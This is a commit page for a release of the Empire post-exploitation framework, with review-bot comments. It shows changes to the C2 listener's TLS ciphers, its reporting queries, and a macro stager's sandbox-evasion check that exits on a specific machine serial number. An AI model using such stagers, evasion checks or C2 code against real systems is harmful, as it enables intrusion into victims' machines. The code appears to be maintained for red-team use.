Merge pull request #171 from BC-SECURITY/dev
v3.1.5 Master Release
Cx01N authored Apr 14, 2020
2 parents 4a14649 + 053bf32 commit d2da774
Showing 6 changed files with 50 additions and 13 deletions.
2 changes: 1 addition & 1 deletion VERSION
@@ -1 +1 @@
3.1.4
3.1.5
7 changes: 7 additions & 0 deletions changelog
@@ -1,3 +1,10 @@
4/13/2020
------------
- Version 3.1.5 Master Release
- Fixed macro staging bug - #164 (@Hubbl3)
- Fixed TLS cipher suite issue with PowerShell 2 - #155 (@tyraniter)
- Updated API reporting for Starkiller integration - #168 (@Cx01N)

4/4/2020
------------
- Version 3.1.4 Master Release
32 changes: 29 additions & 3 deletions empire
Expand Up @@ -1178,12 +1178,38 @@ def start_restful_api(empireMenu, suppress=False, username=None, password=None,
"""
Returns JSON describing the reporting events from the backend database.
"""
reportingRaw = execute_db_query(conn, 'SELECT ID, name, event_type, message, time_stamp, taskID FROM reporting')
reportingRaw = execute_db_query(conn, '''
SELECT
reporting.time_stamp,
event_type,
u.username,
substr(reporting.name, pos+1) as agent_name,
a.hostname,
taskID,
t.data as "Task",
r.data as "Results"
FROM
(
SELECT
time_stamp,
event_type,
name,
instr(name, '/') as pos,
taskID
FROM reporting
WHERE name LIKE 'agent%'
AND reporting.event_type == 'task' OR reporting.event_type == 'checkin') reporting
LEFT OUTER JOIN taskings t on (reporting.taskID = t.id) AND (agent_name = t.agent)
LEFT OUTER JOIN results r on (reporting.taskID = r.id) AND (agent_name = r.agent)
JOIN agents a on agent_name = a.session_id
LEFT OUTER JOIN users u on t.user_id = u.id
ORDER BY reporting.time_stamp DESC
''')
reportingEvents = []

for reportingEvent in reportingRaw:
[ID, name, event_type, message, time_stamp, taskID] = reportingEvent
reportingEvents.append({"ID":ID, "agentname":name, "event_type":event_type, "message":json.loads(message), "timestamp":time_stamp, "taskID":taskID})
[time_stamp, event_type, user_name, agent_name, host_name, taskID, task, results] = reportingEvent
reportingEvents.append({"timestamp":time_stamp, "event_type":event_type, "username":user_name, "agent_name":agent_name, "host_name":host_name, "taskID":taskID, "task":task, "results":results})

return jsonify({'reporting' : reportingEvents})

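Review bot: The new WHERE clause on the `AND reporting.event_type == 'task' OR reporting.event_type == 'checkin'` line has no parentheses, so SQL precedence evaluates it as `(name LIKE 'agent%' AND event_type == 'task') OR event_type == 'checkin'`, and checkin rows are no longer restricted to `agent%` names; the same unparenthesised clause is visible as context inside do_report in lib/common/empire.py. Group the disjunction explicitly: `WHERE name LIKE 'agent%'` followed by `AND (reporting.event_type == 'task' OR reporting.event_type == 'checkin')) reporting`. Separately, `t.data` and `r.data` are passed to jsonify unchanged, whereas do_report in lib/common/empire.py decodes bytes columns before using them, so if either column is stored as bytes this endpoint will presumably fail to serialize — decode or `str()` them as that path does. The inner `JOIN agents a` also silently drops events whose session_id is no longer in the agents table, which the replaced query returned; if that is intended, a one-line comment above the query saying so would help. The enclosing inner function begins above the hunk.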
14 changes: 8 additions & 6 deletions lib/common/empire.py
Expand Up @@ -15,7 +15,7 @@
from builtins import str
from builtins import range

VERSION = "3.1.4 BC-Security Fork"
VERSION = "3.1.5 BC-Security Fork"

from pydispatch import dispatcher

Expand Down Expand Up @@ -968,8 +968,9 @@ def do_report(self, line):
# Empire Log
cur.execute("""
SELECT
time_stamp,
reporting.time_stamp,
event_type,
u.username,
substr(reporting.name, pos+1) as agent_name,
a.hostname,
taskID,
Expand All @@ -986,9 +987,10 @@ def do_report(self, line):
FROM reporting
WHERE name LIKE 'agent%'
AND reporting.event_type == 'task' OR reporting.event_type == 'checkin') reporting
LEFT OUTER JOIN taskings t on (reporting.taskID = t.id) AND (agent_name = t.agent)
LEFT OUTER JOIN results r on (reporting.taskID = r.id) AND (agent_name = r.agent)
JOIN agents a on agent_name = a.session_id
LEFT OUTER JOIN taskings t on (reporting.taskID = t.id) AND (agent_name = t.agent)
LEFT OUTER JOIN results r on (reporting.taskID = r.id) AND (agent_name = r.agent)
JOIN agents a on agent_name = a.session_id
LEFT OUTER JOIN users u on t.user_id = u.id
""")
rows = cur.fetchall()
print(helpers.color("[*] Writing data/master.log"))
Expand All @@ -1000,7 +1002,7 @@ def do_report(self, line):
for n in range(len(row)):
if isinstance(row[n], bytes):
row[n] = row[n].decode('UTF-8')
f.write('\n' + row[0] + ' - ' + row[3] + ' (' + row[2] + ')> ' + str(row[5]) + '\n' + str(row[6]) + '\n')
f.write('\n' + row[0] + ' - ' + row[3] + ' (' + row[2] + ')> ' + str(row[5]) + '\n' + str(row[6]) + '\n' + str(row[7]) + '\n')
f.close()
cur.close()
finally:
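Review bot: The rewritten f.write line concatenates `row[2]` (now `u.username`) straight into the string, but that column comes from the `LEFT OUTER JOIN users` added two hunks above, so rows whose taskID matches no tasking — presumably the checkin events the query deliberately includes — carry NULL there and `' (' + row[2] + ')'` raises TypeError, aborting the whole report. Guard it like the other nullable fields: `' (' + str(row[2]) + ')> '`, or substitute a placeholder when it is None. The new `str(row[7])` for Results is fine, but indices 0/2/3/5/6/7 now depend on the column order of the SELECT in the earlier hunk; a comment above the write, `# row: time_stamp, event_type, username, agent_name, hostname, taskID, task, results`, would keep the two in step. do_report begins before the first hunk of this file and the try/finally around the write continues past the last one.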
6 changes: 3 additions & 3 deletions lib/listeners/http.py
Expand Up @@ -1239,9 +1239,9 @@ def handle_post(request_uri):

context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
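Review bot: `random.choice(cipherlist_tls10)` on the `selectciph = ...` line is applied to a one-element list, so it always yields the same suite; `cipherlist_tls10[0]` (or the literal string) states what actually happens. The list name also implies the second suite is TLS 1.0-specific, whereas ECDHE-RSA-AES256-SHA is a CBC/SHA-1 suite negotiable under TLS 1.0 through 1.2, so the reason for always appending it deserves a why-comment tied to the changelog entry: `# One AES-CBC/SHA-1 suite is always appended so PowerShell 2 clients can negotiate (#155)`. The enclosing block begins above the hunk and continues after it.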
2 changes: 2 additions & 0 deletions lib/stagers/windows/macro.py
Expand Up @@ -177,6 +177,8 @@ def generate(self):
macro += "Public Function "+Method+"() As Variant\n"

if OutlookEvasionBool == True:
macro += "\tstrComputer = \".\"\n"
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\cimv2\")\n"
macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n"
macro += "\tFor Each objItem In ID\n"
macro += "\t\tIf StrComp(objItem.IdentifyingNumber, \"2UA20511KN\") = 0 Then End\n"
